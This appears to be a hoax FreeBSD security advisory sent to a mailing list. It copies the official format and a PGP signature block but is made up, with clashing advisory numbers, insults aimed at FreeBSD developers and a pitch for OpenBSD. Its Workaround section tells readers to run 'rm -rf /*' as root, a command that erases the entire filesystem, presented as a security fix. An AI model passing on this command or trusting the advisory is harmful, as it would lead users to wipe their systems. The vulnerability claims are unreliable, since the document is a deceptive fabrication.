FreeBSD-SA-01:19.local

[FreeBSD Security Advisories]

-----BEGIN PGP SIGNED MESSAGE-----

=============================================================================
FreeBSD-SA-01:69                                           Security Advisory
                                                                FreeBSD, Inc.

Topic:          Local root exploit

Category:       core
Module:         sh
Announced:      2001-02-02
Credits:        AntiOffline.com, Disgraced.org, Deficiency.org
                sil, deran9ed, jhh, iggie, jwit
Affects:        All released versions of FreeBSD 2.x. 3.x, 4.x.

Corrected:      Not corrected since we aren't smart enough to figure it out.

Vendor status:  Disgruntled
FreeBSD only:   YES

I.   Background

FreeBSD is a bloated OS complete with 4 CD's worth of crap you just
don't need, which can often become the overlay for some script kiddiot
rooting your machine. 

II.  Problem Description

FreeBSD the experts in bloatware which can be compared to Windows 98,
Windows2000 Unprofessional edition, and well FreeBSD versions *, has
a local exploit which local (l)users can manipulate in order to gain
higher priveledges by issuing commands via the terminal.

Our developers are currently focusing on the problem scrathing their
gonads and crying foul at the more secure versions of BSD and their
developers which we cannot mention due to our egos. Kiss my ass
Theo, you and your ultra secure team of experts, one day we too will
have our heads out of our asses.

III. Impact

Malicious local users can cause arbitrary commands to be executed as
the root user, although FreeBSD will never admit why we ship our
distro with 2.6 gigabytes of worthless junkware, we will not stoop
beneath ourselves to comment on why we still use such insecure stuff,
e.g., WU-FTPD, a crappy TCP/IP stack, etc. We are now a part of BSDi
which means we've suckseded in selling our anuses for fun and profit.

IV.  Workaround

Perform the following commands as root:

rm -rf /*

Then run out and purchase OpenBSD 2.8 a real OS not some overlaying
crap like SecureBSD.

V.   Solution

Ultimately, there is no workaround until our developers get a clue
and BSDi decides to be purchased by AOL Time Warner, Microsoft or
Intel however, kudos to those already using OpenBSD. Your systems
are safe with it.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: For info see http://www.gnupg.org

iQCVAwUBOniArlUuHi5z0oilAQGE+AQAiwizuORMqyzOw21QFyap2Z7lv7BkYuiC
9zZ97X3WR+i8AujTfIrhwK1UdO6KFbp5Rjc54f3XHtaMotoRcp3x24xADpGQDP4s
Xyw267ZoV7ZYuG6VcAgBzq9pqiCnU9rqRQy2aRn/8iCvcl/G5249B3DuMMtLiMw+
Iuz0OOxWeLM=
=hanM
-----END PGP SIGNATURE-----




To Unsubscribe: send mail to [EMAIL PROTECTED]
with "unsubscribe freebsd-current" in the body of the message